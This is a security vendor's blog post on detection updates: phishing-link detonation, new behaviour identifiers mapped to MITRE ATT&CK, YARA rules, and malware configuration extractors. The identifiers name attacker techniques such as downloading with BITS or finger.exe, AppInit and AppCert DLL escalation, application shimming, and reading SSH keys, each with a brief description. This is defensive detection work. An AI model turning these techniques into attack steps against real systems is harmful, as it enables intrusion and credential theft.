Detection & Signature updates

May 02nd 2023

Latest from VMRay:

Detection and signature updates

05.02.2023

Table of Contents

Introduction

With this article, we are ready to share a new series of posts that will reveal the latest signature and detection changes.

Constant research in threat landscape is vital to VMRay products – DeepResponse, FinalVerdict and TotalInsight – as it allows us to react to the latest malware developments and address new threats. In recent times, the VMRay Labs team has focused on:

  • Addressing new phishing campaigns
  • Adding new VMRay Threat Identifiers (VTIs)
  • YARA rules extension
  • Updates to malware configuration extractors

Now, let’s dive into each topic in more detail. 

Beating the Tricky Phishing Campaigns

Malicious Adobe Acrobat Sign URLs

In the last months, we observed more and more URL-targeted phishing attacks.

One of them attempts to trick the user into clicking a URL on the Adobe Acrobat Sign document, which is often trusted by its recipients. To address this threat, we improved the logic of the Smart Link Detonation feature, which automatically evaluates and detonates hyperlinks in documents and email samples.

The URL detonation is implemented in our Automatic User Interaction (Auto UI) engine. Auto UI simulates user actions during Dynamic Analysis, enabling comprehensive detonation of samples.

Below is an Adobe Acrobat Sign sample showing a picture that links to a phishing HTML file hosted on mediafire.com. With the Smart Link Detonation improvements, the VMRay Platform successfully handles the Adobe Acrobat Sign URL and detects the phishing attempt.

Scams Using Audio Voicemail Links 

Upon discovering another campaign that entices the users into clicking the link to play an audio message that leads to an undetected phishing page, we improved the behavior of Adaptive Browsing Simulation – a feature of Dynamic Web Analysis that automatically detects and clicks on user interface buttons to trigger payload delivery and flush out phishing attacks requiring user clicks in the browser.

Now, such audio message links are clicked, and phishing pages are correctly detected.  

VMRay’s New Threat Identifiers

Let’s start with a quick recap on what VTIs are: VTIs are a collection of malware issues used during analysis to evaluate samples and contribute to the final determination of a Verdict. 

For example, ‘Reads ssh keys’ is a VTI in the Data Collection VTI Category. VTIs flag threatening or unusual behavior and rate the maliciousness on a scale of 1 to 5, with 5 being the most malicious. The VMRay products present VTIs on the analyzed sample overview with a score for each on a scale of 1 to 5. 

These are some of the VTIs from a broader changelog that we added to address the latest threats: 

Subscribe

Stay current on the threat landscape with industry-leading insights.

VTI Operation DescriptionVTI CategoryMITRE ATT&CK® IDWhy it’s important
Detect using BITS to download filesNetwork ConnectionT1197 [legacy T1197, T1105]BITS (Background Intelligent Transfer Service) jobs can be exploited by adversaries to establish persistence and carry out covert background activities on a compromised system. BITS jobs consist of a queue that contains one or more file transfer tasks, making them an attractive target for malicious actors seeking to evade detection while conducting surreptitious activities.
Detect file download attempts with finger.exeNetwork ConnectionT1105 [legacy: T1105]Adversaries may abuse legitimate command-line tools like finger.exe to stealthily download and execute malicious payloads from cloud storage and file-sharing services, allowing them to bypass security controls and evade detection
Detect privilege escalation using AppInit DllsPrivilege EscalationT1546.010 [legacy: T1103]Malicious actors can achieve persistence and elevate privileges by running malicious code that is triggered by these DLLs loaded into processes, thereby exploiting a Windows operating system feature to evade detection
Detect privilege escalation using AppCert DllsPrivilege EscalationT1546.009 [legacy: T1182]
Detect persistence using SilentProcessExit monitorPrivilege EscalationT1546.012 [legacy: T1183]Attackers use this technique to evade detection and remain on a compromised system for extended periods of time. The technique involves running malicious code as a process that silently exits when no longer needed, making it difficult to detect using traditional process monitoring methods.
Detect application shimmingPrivilege EscalationT1546.011 [legacy: T1138]Shimming involves the use of third-party software to modify application behavior, often for compatibility reasons, but attackers can abuse this technique to inject malicious code into legitimate processes to gain elevated privileges and evade detection.

VTI Operation Description

Detect using BITS to download files

VTI Category

Network Connection

MITRE ATT&CK® ID

T1197 [legacy T1197, T1105]

Why it’s important

BITS (Background Intelligent Transfer Service) jobs can be exploited by adversaries to establish persistence and carry out covert background activities on a compromised system. BITS jobs consist of a queue that contains one or more file transfer tasks, making them an attractive target for malicious actors seeking to evade detection while conducting surreptitious activities.

Detect file download attempts with finger.exe

Network Connection

T1105 [legacy: T1105]

Adversaries may abuse legitimate command-line tools like finger.exe to stealthily download and execute malicious payloads from cloud storage and file-sharing services, allowing them to bypass security controls and evade detection

Detect privilege escalation using AppInit Dlls

Detect privilege escalation using AppCert Dlls

Privilege Escalation

Privilege Escalation

T1546.010 [legacy: T1103]

T1546.009 [legacy: T1182]

Malicious actors can achieve persistence and elevate privileges by running malicious code that is triggered by these DLLs loaded into processes, thereby exploiting a Windows operating system feature to evade detection

Detect persistence using SilentProcessExit monitor

Privilege Escalation

T1546.012 [legacy: T1183]

Attackers use this technique to evade detection and remain on a compromised system for extended periods of time. The technique involves running malicious code as a process that silently exits when no longer needed, making it difficult to detect using traditional process monitoring methods. 

Detect application shimming

Privilege Escalation

T1546.011 [legacy: T1138]

Shimming involves the use of third-party software to modify application behavior, often for compatibility reasons, but attackers can abuse this technique to inject malicious code into legitimate processes to gain elevated privileges and evade detection.

VTI Operation Description

Detect using BITS to download files

VTI Category

Network Connection

MITRE ATT&CK® ID

T1197 [legacy T1197, T1105]

Why it’s important

BITS (Background Intelligent Transfer Service) jobs can be exploited by adversaries to establish persistence and carry out covert background activities on a compromised system. BITS jobs consist of a queue that contains one or more file transfer tasks, making them an attractive target for malicious actors seeking to evade detection while conducting surreptitious activities.

VTI Operation Description

Detect file download attempts with finger.exe

VTI Category

Network Connection

MITRE ATT&CK® ID

T1105 [legacy: T1105]

Why it’s important

Adversaries may abuse legitimate command-line tools like finger.exe to stealthily download and execute malicious payloads from cloud storage and file-sharing services, allowing them to bypass security controls and evade detection

VTI Operation Description

Detect privilege escalation using AppInit Dlls

VTI Category

Privilege Escalation

MITRE ATT&CK® ID

T1546.010 [legacy: T1103]

Why it’s important

Malicious actors can achieve persistence and elevate privileges by running malicious code that is triggered by these DLLs loaded into processes, thereby exploiting a Windows operating system feature to evade detection

VTI Operation Description

Detect privilege escalation using AppCert Dlls

VTI Category

Privilege Escalation

MITRE ATT&CK® ID

T1546.009 [legacy: T1182]

Why it’s important

Malicious actors can achieve persistence and elevate privileges by running malicious code that is triggered by these DLLs loaded into processes, thereby exploiting a Windows operating system feature to evade detection

VTI Operation Description

Detect persistence using SilentProcessExit monitor

VTI Category

Privilege Escalation

MITRE ATT&CK® ID

T1546.012 [legacy: T1183]

Why it’s important

Attackers use this technique to evade detection and remain on a compromised system for extended periods of time. The technique involves running malicious code as a process that silently exits when no longer needed, making it difficult to detect using traditional process monitoring methods. 

VTI Operation Description

Detect application shimming

VTI Category

Privilege Escalation

MITRE ATT&CK® ID

T1546.011 [legacy: T1138]

Why it’s important

Shimming involves the use of third-party software to modify application behavior, often for compatibility reasons, but attackers can abuse this technique to inject malicious code into legitimate processes to gain elevated privileges and evade detection.

Fresh Built-in YARA Rulesets

YARA is an open source tool that helps malware researchers identify and classify malware by family based on known binary patterns and strings. YARA works by ingesting rules and applying them against various elements of the analysis (such as files and registry keys) to flag potentially malicious files and processes.

VMRay products contain several hundred built-in YARA rules, and that list keeps on growing. To strengthen the detection efficacy, our Threat Analysts made the following updates: 

Extended YARA coverage for:

 

Improved YARA rules for:

  • Cobalt Strike
  • BumbleBee Loader
  • GuLoader Shellcode
  • RecordBreaker Stealer
  • RedLine Stealer

 

On the Lookout for Commodity Malware Families

Recently we released the 2023.2.0 version of our Platform, which we happily shared in this post. However, we cannot forget that malware developers are also improving and adding new features to attack with greatest power.

Our Labs team analyze and track the latest malware developments in various ways, including malware configuration extractors. But what are malware configurations?? Each malware sample has an embedded configuration that tells the sample what to execute, how to infect the system, how to exfiltrate data, what evasion methods are enabled, and anything else the malware developer implemented.

Find a list of recently updated configuration extractors with some technical details below: 

Malware Family

Aurora Stealer 

Update Reason

The number of Aurora Stealer samples has started to rise considerably at the end of 2022 and the beginning of 2023. Furthermore, recently it was distributed via malicious Google Ads, which makes it a dangerous threat.

PrivateLoader

PrivateLoader samples were used very frequently in 2022. As loaders are the main entry point to deploy further malicious payloads, it is very important to cover them via configuration extraction and generate high-quality Indicators of Compromise (IOCs) which can be used to hunt as well as to protect environments.

Malware Family

Aurora Stealer 

Update Reason

The number of Aurora Stealer samples has started to rise considerably at the end of 2022 and the beginning of 2023. Furthermore, recently it was distributed via malicious Google Ads, which makes it a dangerous threat.

Malware Family

PrivateLoader

Update Reason

PrivateLoader samples were used very frequently in 2022. As loaders are the main entry point to deploy further malicious payloads, it is very important to cover them via configuration extraction and generate high-quality Indicators of Compromise (IOCs) which can be used to hunt as well as to protect environments.

Improved configuration extractors for: 

Malware Family

Agent Tesla

Update Reason

Adjusted logic used to locate embedded configuration if SMTP-based exfiltration method is used.

BumbleBee

Improved configuration extractor to support extraction from samples and not only from memory dumps. We also fixed C2 extraction to only add valid entries.

Cobalt Strike

Improved configuration extractor to extract more elements from the embedded configuration. 

Emotet

Fixed C2 extraction which now decides whether a C2 address is a valid or a fake entry. Additionally, extraction has been adjusted to also have this information in the configuration as well as IOCs and artifacts.

RecordBreaker

Improved configuration extractor to cover more samples by adjusting its internal logic used to locate and extract the configuration. 

RedLine

Improved configuration extractor to cover more samples by adjusting its internal logic used to locate the embedded configuration. 

Snake Keylogger

Adjusted the configuration extractor to also support samples which have an encrypted configuration.

Warzone

Adjusted configuration extractor to support samples with RC4+ encrypted configurations.

XLoader

Adjusted configuration extractor to also cover XLoader samples of version 2.8.

Malware Family

Agent Tesla

Update Reason

Adjusted logic used to locate embedded configuration if SMTP-based exfiltration method is used.

Malware Family

BumbleBee

Update Reason

Improved configuration extractor to support extraction from samples and not only from memory dumps. We also fixed C2 extraction to only add valid entries.

Malware Family

Cobalt Strike

Update Reason

Improved configuration extractor to extract more elements from the embedded configuration. 

Malware Family

Emotet

Update Reason

Fixed C2 extraction which now decides whether a C2 address is a valid or a fake entry. Additionally, extraction has been adjusted to also have this information in the configuration as well as IOCs and artifacts.

Malware Family

RecordBreaker

Update Reason

Improved configuration extractor to cover more samples by adjusting its internal logic used to locate and extract the configuration. 

Malware Family

Snake Keylogger

Update Reason

Adjusted the configuration extractor to also support samples which have an encrypted configuration.

Malware Family

Warzone

Update Reason

Adjusted configuration extractor to support samples with RC4+ encrypted configurations.

Malware Family

XLoader

Update Reason

Adjusted configuration extractor to also cover XLoader samples of version 2.8.

Izabela Komorowska

Technical Writer with over 8 years of experience in various tech companies ranging from small startups to large SaaS enterprises. Enthusiastic about writing easy-to-understand customer documentation that clarifies product's features and benefits.

See VMRay in action.
Solve your malware & phishing challenges.

Calculate how much malware false positives are costing your organization:
Malware False Positive Cost Calculator